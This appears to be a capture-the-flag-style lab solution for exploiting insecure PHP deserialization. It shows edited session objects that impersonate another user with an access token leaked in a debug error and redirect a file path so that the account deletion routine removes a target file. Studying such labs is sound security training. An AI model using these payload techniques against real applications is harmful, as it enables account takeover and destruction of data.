Эксплуатация небезопасной десериализации через функции приложения

This lab uses a serialization-based session mechanism. A certain feature invokes a dangerous method on data provided in a serialized object. To solve the lab, edit the serialized object in the session cookie and use it to delete the morale.txt file from Carlos's home directory.

You can log in to your own account using the following credentials: wiener:peter

You also have access to a backup account: gregg:rosebud

Set-Cookie: session=Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJ5Mnk5NDgyZ3JrNTloYzk3cDl5b2p6YWZrbnEzYTdndyI7czoxMToiYXZhdGFyX2xpbmsiO3M6MTk6InVzZXJzL3dpZW5lci9hdmF0YXIiO30%3d;

O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"y2y9482grk59hc97p9yojzafknq3a7gw";s:11:"avatar_link";s:19:"users/wiener/avatar";}

O:4:"User":3:{s:8:"username";s:6:"carlos";s:12:"access_token";i:0;s:11:"avatar_link";s:23:"users/carlos/morale.txt";}

PHP Fatal error: Uncaught Exception: (DEBUG: $access_tokens[$user->username] = s6z1ycke3hy270rh0gjz1khugfv1uhai, $user->access_token = 0, $access_tokens = [s6z1ycke3hy270rh0gjz1khugfv1uhai, xronwvnui1pac24shhu3reit5nur26bc, y2y9482grk59hc97p9yojzafknq3a7gw]) Invalid access token for user carlos in /var/www/index.php:8 Stack trace: #0 {main} thrown in /var/www/index.php on line 8

O:4:"User":3:{s:8:"username";s:6:"carlos";s:12:"access_token";s:32:"s6z1ycke3hy270rh0gjz1khugfv1uhai";s:11:"avatar_link";s:23:"users/carlos/morale.txt";}

Internal Server Error

PHP Warning: file_put_contents(users/carlos/disabled): failed to open stream: No such file or directory in /home/carlos/User.php on line 45 PHP Fatal error: Uncaught Exception: Could not write to users/carlos/disabled in /home/carlos/User.php:46 Stack trace: #0 Command line code(5): User->delete() #1 {main} thrown in /home/carlos/User.php on line 46

O:4:"User":3:{s:8:"username";s:6:"carlos";s:12:"access_token";s:32:"s6z1ycke3hy270rh0gjz1khugfv1uhai";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}